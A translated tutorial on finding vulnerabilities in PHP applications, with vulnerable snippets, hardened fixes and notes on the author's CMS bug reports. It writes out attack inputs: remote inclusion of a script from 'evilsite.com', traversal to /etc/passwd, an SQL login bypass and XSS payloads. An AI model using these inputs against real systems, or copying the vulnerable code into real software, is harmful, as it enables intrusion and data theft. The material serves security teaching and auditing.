Lxj616 · 2014/02/25 12:07

0x00 Background


Thank you for your comments and discussion.

First I translate and organize an English paper, then fill in examples from my own recent discoveries: thinking first, then examples O(∩_∩)O

To supplement the ideas of the first article, some recently discovered examples have been added (some are also from WooYun's public bugs; those belong to their original authors and are credited in the article).

(Thanks to doze Dragon for the guidance: pay attention to the configuration environment each vulnerability presupposes; it is listed first and then detailed.)

Under the test conditions in this article, the default configuration looks like this:

disabled_functions = N/A (all functions can be used)
register_globals = on (register global variables)
allow_url_include = on (restricts whether remote files can be included)
allow_url_fopen = on
magic_quotes_gpc = off (escapes quotes, backslashes and null characters; for example, " becomes \")
short_open_tag = on (used in some scripts)
file_uploads = on (arbitrary file upload requires this: allow file uploads)
display_errors = on

0x01 Arbitrary File Inclusion


Prerequisite: allow_url_include must be on; otherwise a file has to be uploaded first and included by absolute path.

Tip: the null byte (%00 truncation) technique and the "?" question mark technique.

There are four functions related to file inclusion in PHP:

require
require_once (includes only once)
include
include_once (includes only once)

For example:

<?php
$pagina = $_GET['pagina'];
include $pagina . '.php';   // the user-controlled value gets a fixed .php suffix appended
?>

Example using the null byte:

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00

The null byte ends the string, so the .php suffix appended at the end is dropped.

Another example:

<?php
$pagina = $_GET['pagina'];
include $pagina . 'logged=1';
?>

Example using the "?" question mark:

http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1

Everything appended after the "?" becomes the query string of the remote URL, so the trailing junk no longer affects the path.

How to fix it:

allow_url_include = on
allow_url_fopen = on

Simply put: don't allow special characters; filter "/" and the http://, https://, ftp:// and smb:// schemes.

Okay, let's look at an example from WooYun.

WooYun: ecmall local file inclusion

$app = isset($_REQUEST['app']) ? trim($_REQUEST['app']) : $default_app;
$act = isset($_REQUEST['act']) ? trim($_REQUEST['act']) : $default_act;
// $app is clearly under our control; because ".app.php" is appended, it has to be truncated
$app_file = $config['app_root'] . "/{$app}.app.php";
// This should be a local file, so is_file must be true
if (!is_file($app_file)) {
    exit('Missing controller');
}
// $app_file is then included

There are also special tricks, such as constructing wildcards.

WooYun: local file inclusion on the University of Jinan main site leads to code execution

Check it out for yourself, I thought it was only in textbooks…

Mining method: globally search for the four functions. A require or similar call that only appears in the middle of a file is usually strictly validated; when reading through, pay more attention to the include calls at the top of the file.

0x02 Local File Inclusion


Tip: under Windows we can use "..\" in place of "../", or "..%5C" (URL-encoded).

The following cases:

<?php
$pagina = $_GET['pagina'];
include '/pages/' . $pagina;
?>

Examples of use:

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The null byte truncation and question mark techniques apply here as well.

In fact this is similar to the above, except that directory traversal is used.

Fix: filter dots and slashes.
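As an added example (not code from the original article), here is the include pattern from 0x01 and 0x02 next to a whitelist-based replacement; the /pages/ paths and page names are assumed.

```php
<?php
// Added example: vulnerable include from the article beside a hardened version.

// Vulnerable: the request value becomes part of the path, so %00 truncation,
// the "?" trick and ../ traversal all change which file gets included.
function include_page_vulnerable(string $pagina): void
{
    include '/pages/' . $pagina;          // e.g. ../../../../etc/passwd
}

// Hardened: map the parameter to a fixed set of local files (assumed paths).
// No request data reaches include() at all; unknown names are rejected.
const ALLOWED_PAGES = [
    'home'    => '/pages/home.php',
    'contact' => '/pages/contact.php',
];

function include_page_safe(string $pagina): void
{
    if (!array_key_exists($pagina, ALLOWED_PAGES)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include ALLOWED_PAGES[$pagina];
}

// Defence in depth when a fixed map is not possible: accept only a plain name.
// The character class excludes NUL, "/", "\", "?", ":" and ".", so null byte
// truncation, traversal on Linux and Windows, and http://, smb:// schemes all fail.
function is_plain_page_name(string $pagina): bool
{
    return $pagina !== ''
        && strlen($pagina) <= 64
        && preg_match('/^[A-Za-z0-9_-]+$/', $pagina) === 1;
}

include_page_safe($_GET['pagina'] ?? 'home');
```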

0x03 Arbitrary File Download


Prerequisite: remote files can only be opened when allow_url_fopen is on, but arbitrary file download generally does not involve "remote" files anyway.

Supplementing the previous article:

file_get_contents: reads the entire file into a string
readfile: outputs the entire file
file: reads the file into an array
fopen: opens a file or URL
highlight_file: highlights and outputs the source
show_source: displays the source code

The example is the same as the previous article

0x04 SQL Injection


Prerequisite: magic_quotes_gpc = off. This of course refers to string-type injection; numeric-type injection can still be blind-injected even with it on.

Supplementary login bypass case:

$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") or die("<p>" . mysql_error() . "</p>\n");

This is much easier to exploit:

username : admin ' or ' 1=1
password : sirgod

Mining method: when you find an injection in the login, don't rush to dump the tables; consider bypassing the login instead.
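As an added example (not code from the original article), the 0x04 login query built by string splicing is shown next to a PDO prepared statement; the $pdo connection and the table prefix are assumed.

```php
<?php
// Added example: the article's spliced login query and a prepared-statement replacement.

function build_login_query_vulnerable(string $tablestart, string $user, string $pass): string
{
    $postpass = md5($pass);
    // The page's pattern: the username lands inside the SQL text unescaped
    return "SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$user' AND password = '$postpass'";
}

// With username "admin ' or ' 1=1" (password "sirgod") the text sent to MySQL is
//   SELECT * FROM login WHERE brugernavn = 'admin ' or ' 1=1' AND password = '<md5>'
// The quote in the input closes the literal, so the rest is parsed as SQL, not as data.

function login_safe(PDO $pdo, string $tablestart, string $user, string $pass): bool
{
    // Identifiers cannot be bound: $tablestart must come from config, never from the request.
    // The two values travel separately from the query text, so a quote in $user stays data.
    $stmt = $pdo->prepare(
        "SELECT 1 FROM {$tablestart}login WHERE brugernavn = ? AND password = ?"
    );
    // md5 kept only to match the page's schema; new code should store password_hash() output
    $stmt->execute([$user, md5($pass)]);
    return $stmt->fetchColumn() !== false;
}

// Assumed DSN and credentials; mysql_* used on the page no longer exists in PHP 7+
$pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'user', 'pass', [
    PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
]);
var_dump(login_safe($pdo, '', $_POST['username'] ?? '', $_POST['password'] ?? ''));
```

The same fix applies to the framework-style `$member->where("username ='" . $username . "'")` calls later in the article: pass the value as a bound parameter, never as part of the condition string.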

0x05 Command Execution


Ph4nt0m Security Team (Advanced PHP Application Vulnerability Audit Technology)

(Below is a short excerpt on command execution.)

5.4 Code Injection

5.4.1 Functions in PHP that may cause code injection

Most people know that eval and preg_replace+/e can execute code, but they don’t know that PHP has many functions that can execute code, such as:

assert()
call_user_func()
call_user_func_array()
create_function()
variable functions

Here’s a look at some recent examples of create_function() code execution vulnerabilities:

<?php
//how to exp this code
$sort_by = $_GET["sort_by"];
$sorter = "strnatcasecmp";
$databases = array("test", "test");
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
usort($databases, create_function('$a, $b', $sort_function));
?>

Vulnerability Audit Strategy

PHP version requirement: none
System requirement: none
Audit policy: find the corresponding functions (assert, call_user_func, call_user_func_array, create_function, etc.)

5.4.2 Variable Functions and Double Quotes

Many programmers know the difference between single and double quotation marks.

echo "$a\n";   // double quotes: $a is interpolated
echo '$a\n';   // single quotes: printed literally

Let’s look at the following code:

<?php
//how to exp this code
if ($globals["bbc_email"]) {
    $text = preg_replace(
        array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
              "/\[email\](.*?)\[\/email\]/ies"),
        array("check_email(\"$1\", \"$2\")",
              "check_email(\"$1\", \"$1\")"),
        $text);
}

In addition, many applications store variables inside double quotes in cache, config or data files, which makes it easy to inject variable functions.

Vulnerability Audit Strategy

PHP version requirement: none
System requirement: none
Audit policy: read through the code
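As an added example (not code from the original article or the Ph4nt0m paper), the create_function() sort from 5.4.1 is rewritten so that the request parameter is only ever used as a whitelisted array key; the column names and sample rows are assumed.

```php
<?php
// Added example: the article's create_function() sort beside a closure-based version.

// Constructed sample data (assumed column names)
$databases = [
    ['name' => 'test2', 'size' => 20],
    ['name' => 'test1', 'size' => 10],
];

// Shape from the page: the request value is pasted into a function body, so
// create_function() compiles whatever text the client sent. Removed in PHP 8.
function sort_vulnerable(array $rows, string $sort_by): array
{
    $sorter = 'strnatcasecmp';
    $sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]); ';
    usort($rows, create_function('$a, $b', $sort_function));
    return $rows;
}

// Safe: $sort_by is checked against a fixed list and used only as an array key;
// the comparison is a real closure, so no request data is ever treated as source.
function sort_safe(array $rows, string $sort_by): array
{
    $allowed = ['name', 'size'];
    if (!in_array($sort_by, $allowed, true)) {
        $sort_by = 'name';
    }
    usort($rows, function (array $a, array $b) use ($sort_by): int {
        return strnatcasecmp((string) $a[$sort_by], (string) $b[$sort_by]);
    });
    return $rows;
}

print_r(sort_safe($databases, $_GET['sort_by'] ?? 'name'));
```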

0x06 Cross-Site Scripting (XSS)


<?php
$name = $_GET['name'];
print $name;
?>

http://127.0.0.1/test.php?name=<script>alert("XSS")</script>

<?php
$name = addslashes($_GET['name']);
print '<table name="' . $name . '"></table>';
?>

http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83))</script>

String.fromCharCode is used to bypass addslashes: the script then needs no quotes of its own.

Mining method: focus on the code responsible for output, keeping in mind the general logic the program used earlier to handle variables (how strong is the HTML tag filtering?).
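As an added example (not code from the original article), here is why addslashes() does not protect the attribute in the second 0x06 case, beside context-aware HTML encoding.

```php
<?php
// Added example: addslashes() versus htmlspecialchars() for the article's attribute output.

// Page's pattern: addslashes() only escapes ' " \ and NUL with a backslash.
// A backslash means nothing in HTML, so \" still terminates the attribute value.
function render_vulnerable(string $name): string
{
    $name = addslashes($name);
    return '<table name="' . $name . '"></table>';
}

// Encode for the context the value lands in (HTML attribute). ENT_QUOTES covers
// single-quoted attributes too; an explicit UTF-8 charset avoids encoding tricks.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_safe(string $name): string
{
    return '<table name="' . h($name) . '"></table>';
}

// Constructed payload in the shape of the article's second example
$payload = '"><script>alert(String.fromCharCode(88,83,83))</script>';
echo render_vulnerable($payload), "\n"; // <table name="\"><script>...  the tag is broken out of
echo render_safe($payload), "\n";       // <table name="&quot;&gt;&lt;script&gt;...  inert text
```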

0x07 Variable Overwrite


Prerequisite: register_globals = on is required.

<?php
if ($logged == true) {
    echo 'Logged in.';
} else {
    print 'Not logged in.';
}
?>

http://127.0.0.1/test.php?logged=1

Logged in without authentication.

0x08 Unauthorized Access to Admin Pages


http://127.0.0.1/admin/files.php
http://127.0.0.1/admin/db_lookup.php

This vulnerability may exist if these pages can be accessed directly without authentication.

To find it: with register_globals = on, note where the variable first appears.

0x09 Cross-Site Request Forgery (CSRF)


Prerequisite: no token; usually combined with XSS.

<?php
check_auth();
if (isset($_GET['news'])) {
    unlink('files/news' . $news . '.txt');   // $news is populated by register_globals
} else {
    die('File not deleted');
}
?>

http://127.0.0.1/test.php?news=1

This causes file deletion. It does require check_auth, but that is no obstacle under CSRF.

if ($_GET['func'] == 'delete') {
    $del_id = $_GET['id'];
    $query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
    $result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
    while ($results2121 = mysql_fetch_array($result2121)) {
        $their_role = $results2121['ROLE'];
    }
    if ($their_role != '1') {
        mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error());
    }
}

The key is that there is no confirmation of any kind; the request is simply submitted.

http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

How to fix: tokens

<?php
check_auth();
// The submitted token must equal the one stored in the session
if (isset($_GET['news'], $_GET['token']) && $_GET['token'] === $_SESSION['token']) {
    unlink('files/news' . $_GET['news'] . '.txt');
} else {
    die('Error.');
}
?>

So it can't be forged:

http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]

Mining method: check whether sensitive functions such as "add administrator", "change password" and "send the shell address directly to someone's email" have token verification or some other form of confirmation.
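As an added example (not code from the original article), a complete version of the 0x09 token fix: an unguessable per-session token, a constant-time comparison, and state changes only on POST. check_auth() is the article's own auth helper and is assumed to exist.

```php
<?php
// Added example: CSRF token issue and check for the article's news deletion handler.
session_start();

function csrf_token(): string
{
    // One token per session from the CSPRNG; a cross-site page can neither read nor guess it
    if (empty($_SESSION['token'])) {
        $_SESSION['token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['token'];
}

function csrf_check($supplied): bool
{
    // hash_equals compares in constant time; missing session token or non-string input fails closed
    return is_string($supplied)
        && isset($_SESSION['token'])
        && hash_equals($_SESSION['token'], $supplied);
}

// The form carries the token; a forged request from another origin cannot include it
function delete_form(int $news_id): string
{
    return '<form method="post" action="test.php">'
         . '<input type="hidden" name="news" value="' . $news_id . '">'
         . '<input type="hidden" name="token" value="' . csrf_token() . '">'
         . '<button>Delete</button></form>';
}

check_auth();   // assumed helper from the article
if ($_SERVER['REQUEST_METHOD'] === 'POST' && csrf_check($_POST['token'] ?? null)) {
    // Only POST with a valid token changes state; the id is validated before it touches a path
    $id = filter_var($_POST['news'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id !== false) {
        unlink('files/news' . $id . '.txt');
        exit('Deleted');
    }
}
die('Error.');
```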

0x10 References


Part of the content is from [English] www.exploit-db.com/papers/1287… Name: Finding vulnerabilities in PHP scripts FULL (with examples). Author: SirGod

Below are some examples I discovered recently.

0x11 CSCMS V3.5 Latest Version SQL Injection


WooYun: CSCMS V3.5 SQL injection

PS: CSCMS is really a good textbook…

Thanks to @Wudaokou for the reply on the previous article:

For MVC code, look at the framework itself to see if there is a problem, and then look at the model. How strong the model is determines how much space there is, and variable filtering should be pretty much the same when called in the controller, so it's probably not necessary to start reading index.php

After careful consideration I understand this more deeply. For example, in this vulnerability CSCMS refactored its code to an MVC architecture, and as expected the model's xss_clean is misused (or the model has no anti-injection function at all), so the controller ends up exposed. So it's fair to say my earlier "start with index.php" statement was inappropriate; it should depend on the situation.

Thanks to @erevus for the reply on the previous post:

My experience:
dig SQL injection: globally search for the select, insert, update keywords, then find the SQL statement and follow the passed-in variable to see whether there is any filtering
dig arbitrary code execution: globally search for the various functions that can execute commands, and then follow them up one by one.
Dig XSS... I go straight to the black box to see whether it is filtered, then look at the code doing the filtering and see whether I can get around it...

$member->where("username ='" . $username . "'")->save($arr_i);   // update the status

It is easy to miss important string splices like this one inside a framework.

PS: I strongly agree with erevus' XSS mining method; due to limited ability and energy…

0x12 MacCMS All Versions SQL Injection (including the latest 7.x)


WooYun: MacCMS all versions SQL injection (including the latest 7.x)

In fact 7.x was released right when I posted the vulnerability (for 6.x). I glanced at it, found a 360 protection script and stopped looking, assuming they must have filtered everything, until… $_SERVER["HTTP_REFERER"]; $_SERVER["HTTP_REFERER"]; So a reminder to everyone: code auditing needs care and superhuman patience; never take things for granted.

0x13 WanCMS Arbitrary User Password Change


WooYun: WanCMS allows changing any user's password

I finally found another hole in sensitive business logic

A word about cryptography…

MD5 and SHA are hash functions: if you know $a it is easy to compute MD5($a), but knowing MD5($a) it is hard to recover $a. DES is a symmetric cipher; encryption and decryption use the same key.

$reurl = $config['DOMAIN'] . '/accounts/forget_password_t?vc=' . md5(md5($username));

The password reset link here uses MD5 (twice), but the username is known, so the link can be forged directly. This also shows that MD5 is not an encryption method; that would be DES or… The more common approach is to MD5 the username together with the password and a random number, or simply use a random string.
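As an added example (not code from the original article or WanCMS), the forgeable md5(md5($username)) link from 0x13 is replaced by a random, single-use, expiring token; the $pdo connection, the password_resets table (columns id, username, token_hash, expires_at, used) and $config['DOMAIN'] are assumed.

```php
<?php
// Added example: unguessable password reset tokens instead of a hash of the username.

function issue_reset_link(PDO $pdo, array $config, string $username): string
{
    // 256 random bits from the CSPRNG: cannot be derived from the username or anything public
    $token = bin2hex(random_bytes(32));
    // Store only a hash so that a database leak does not hand out live reset links
    $stmt = $pdo->prepare(
        'INSERT INTO password_resets (username, token_hash, expires_at, used) VALUES (?, ?, ?, 0)'
    );
    $stmt->execute([$username, hash('sha256', $token), date('Y-m-d H:i:s', time() + 1800)]);
    return $config['DOMAIN'] . '/accounts/forget_password_t?vc=' . $token;   // same path as the page
}

function consume_reset_token(PDO $pdo, string $token): ?string
{
    // Valid only if the hash matches, it has not expired (30 min) and it was not used before
    $stmt = $pdo->prepare(
        'SELECT id, username FROM password_resets WHERE token_hash = ? AND expires_at > NOW() AND used = 0'
    );
    $stmt->execute([hash('sha256', $token)]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;   // unknown, expired or already used
    }
    // Burn the token so the link works exactly once
    $pdo->prepare('UPDATE password_resets SET used = 1 WHERE id = ?')->execute([$row['id']]);
    return $row['username'];
}
```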

0x14 WanCMS Multiple SQL Injection


WooYun: WanCMS multiple SQL injection

Another example of injection inside a framework:

$u_info = $member->where("username ='" . $username . "'")->find();

As before, username is not filtered; although it looks different from a full SQL statement with SELECT, the effect is the same.

0x15 CSCMS V3.5 SQL Injection After the Update


WooYun: Another SQL injection after CSCMS V3.5 patch

This is another addslashes + unquoted blind injection the vendor missed; what's new is that they seem to have used magic_quotes_gpc for a while and put quotes around most numeric values, but they missed a few…

0x16 TCCMS (Latest) 8.0 GETSHELL

WooYun: TCCMS 8.0 GETSHELL

Arbitrary file upload, provided file_uploads is on.

$fullPath = $path . "/" . $_POST["name"];

I can't believe the file name is taken straight from POST.

In general this should be a UUID or random name, or at least a forced suffix with invisible characters filtered out.

The result of taking values directly from POST is arbitrary file uploads.
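As an added example (not code from the original article or TCCMS), the upload handler lets the server choose the file name and extension instead of trusting $_POST["name"]; $path is the upload directory as on the page, and the allowed types are assumed.

```php
<?php
// Added example: server-chosen name and content-based extension for the 0x16 upload.

function store_upload(string $path, array $file): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('bad upload');
    }
    // Decide the extension from the detected content, never from the client-supplied name
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];  // assumed
    if (!isset($allowed[$mime])) {
        throw new RuntimeException('type not allowed');
    }
    // Random name: no request data reaches the filesystem path at all
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $fullPath = rtrim($path, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $fullPath)) {
        throw new RuntimeException('move failed');
    }
    return $name;
}

echo store_upload($path, $_FILES['file']);   // 'file' is the assumed form field name
```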

0x17 iSiteCMS still has several injection vulnerabilities after release of security patch


WooYun: iSiteCMS still has several injection vulnerabilities after the release of the security patch.

This injection has a special feature: the comma (,) is filtered, so dumping the tables is very hard, and other methods are needed to verify the impact.

$tos = explode(',', trim($arr['to']));

Yes, that one kills the comma.

Solution: stop trying to dump tables and instead construct an error message (because the normal page has no echo) that directly reveals the administrator password.

Summary of the thinking: without a comma the statement can't be broken through, and the first injection has no echo, so keep reading. The program continues running, and there is a second injection further on whose result is spliced into another SQL statement, with error reporting enabled. So construct a WHERE clause whose SQL error message displays the password.

0x18 CSCMS V3.5 Latest Version Backend Command Execution GETSHELL


WooYun: CSCMS V3.5 latest version backend command execution GETSHELL

[email protected] : The framework will have a lot of hidden holes. It’s not clear how to dig them. For example, double quotes cause code execution.

I wanted to imitate "Dede background getShell [20130715]" (original author unknown)…… The result is different, but the idea is the same: the backend always has somewhere to save settings, and saving settings usually means writing config.php (because, unlike other extensions, PHP files can't simply be downloaded). If the filtering when saving settings is insufficient, arbitrary content can be written into the file, and the PHP file is executed on every request.

But such hidden loopholes take a sense that is hard to reach by ordinary thinking.